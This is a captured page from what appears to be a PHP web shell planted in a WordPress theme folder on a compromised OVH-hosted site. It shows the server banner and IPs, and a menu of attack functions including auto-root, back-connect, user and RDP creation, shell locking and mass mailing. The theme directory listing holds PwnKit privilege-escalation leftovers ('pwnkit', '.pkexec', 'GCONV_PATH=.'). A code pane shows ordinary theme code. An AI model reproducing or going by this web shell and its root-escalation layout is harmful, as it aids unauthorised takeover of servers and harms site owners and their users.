Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.75
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
new /
wp-content /
themes /
Avenue /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
tinymce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
612
B
-rw-r--r--
archive.php
2.24
KB
-rw-r--r--
author.php
1.92
KB
-rw-r--r--
blog.php
2.38
KB
-rw-r--r--
category.php
2.31
KB
-rw-r--r--
comments.php
4.26
KB
-rw-r--r--
contact.php
1.64
KB
-rw-r--r--
custom.css
22
B
-rw-r--r--
en_EN.po
6.74
KB
-rw-r--r--
footer.php
1.21
KB
-rw-r--r--
fullwidth.php
471
B
-rw-r--r--
functions.php
3.62
KB
-rw-r--r--
header.php
5.35
KB
-rw-r--r--
index.php
7.94
KB
-rw-r--r--
notifier.xml
1.17
KB
-rw-r--r--
page.php
478
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
85.77
KB
-rw-r--r--
search.php
1.64
KB
-rw-r--r--
searchform.php
474
B
-rw-r--r--
shortcodes.php
11.84
KB
-rw-r--r--
sidebar.php
205
B
-rw-r--r--
single.php
11.57
KB
-rw-r--r--
style.css
30.16
KB
-rw-r--r--
tag.php
1.97
KB
-rw-r--r--
timthumb.php
46.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php get_header(); ?> <!-- BEGIN MAIN --> <div id="main"> <div class="block archive"> <h3> <?php if(is_day()): ?> <?php printf(__('Daily Archives: <span>%s</span>', 'Avenue'), get_the_date()); ?> <?php elseif (is_month()) : ?> <?php printf(__('Monthly Archives: <span>%s</span>', 'Avenue'), get_the_date('F Y')); ?> <?php elseif (is_year()) : ?> <?php printf(__('Yearly Archives: <span>%s</span>', 'Avenue'), get_the_date('Y')); ?> <?php else : ?> <?php _e('Blog Archives', 'Avenue'); ?> <?php endif; ?> <span class="arrows">»</span> </h3> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div id="post-<?php the_ID(); ?>" <?php post_class('block-item-big'); ?>> <?php if(has_post_format('video') || has_post_format('audio') || has_post_format('gallery')) { $icon = '<span class="' . get_post_format($post->ID) . '-icon"></span>'; } else { $icon = ''; } ?> <?php if(has_post_thumbnail()): ?> <?php $image = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID), 'widget-image'); ?> <div class="block-image"><a href='<?php the_permalink(); ?>' title='<?php the_title(); ?>'><img src="<?php echo $image[0]; ?>" alt="<?php the_title(); ?>" width='290' height='160' /></a><?php echo $icon; ?></div> <?php endif; ?> <h2><a href='<?php the_permalink(); ?>' title='<?php the_title(); ?>'><?php the_title(); ?></a></h2> <span class="block-meta"> <span class="heading-author"><?php the_author(); ?></span> <span class="heading-date"><?php the_time('F j, Y'); ?></span> <span class="heading-comments"><?php comments_popup_link('0','1','%'); ?></span> </span> <p><?php echo string_limit_words(get_the_excerpt(), 34); ?></p><a href='<?php the_permalink(); ?>' title='<?php the_title(); ?>' class="readmore"><?php _e('Read More', 'Avenue'); ?> <span class="block-arrows">»</span></a> </div> <?php endwhile; endif; ?> <?php kriesi_pagination($pages = '', $range = 2); ?> </div> </div> <!-- END MAIN --> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close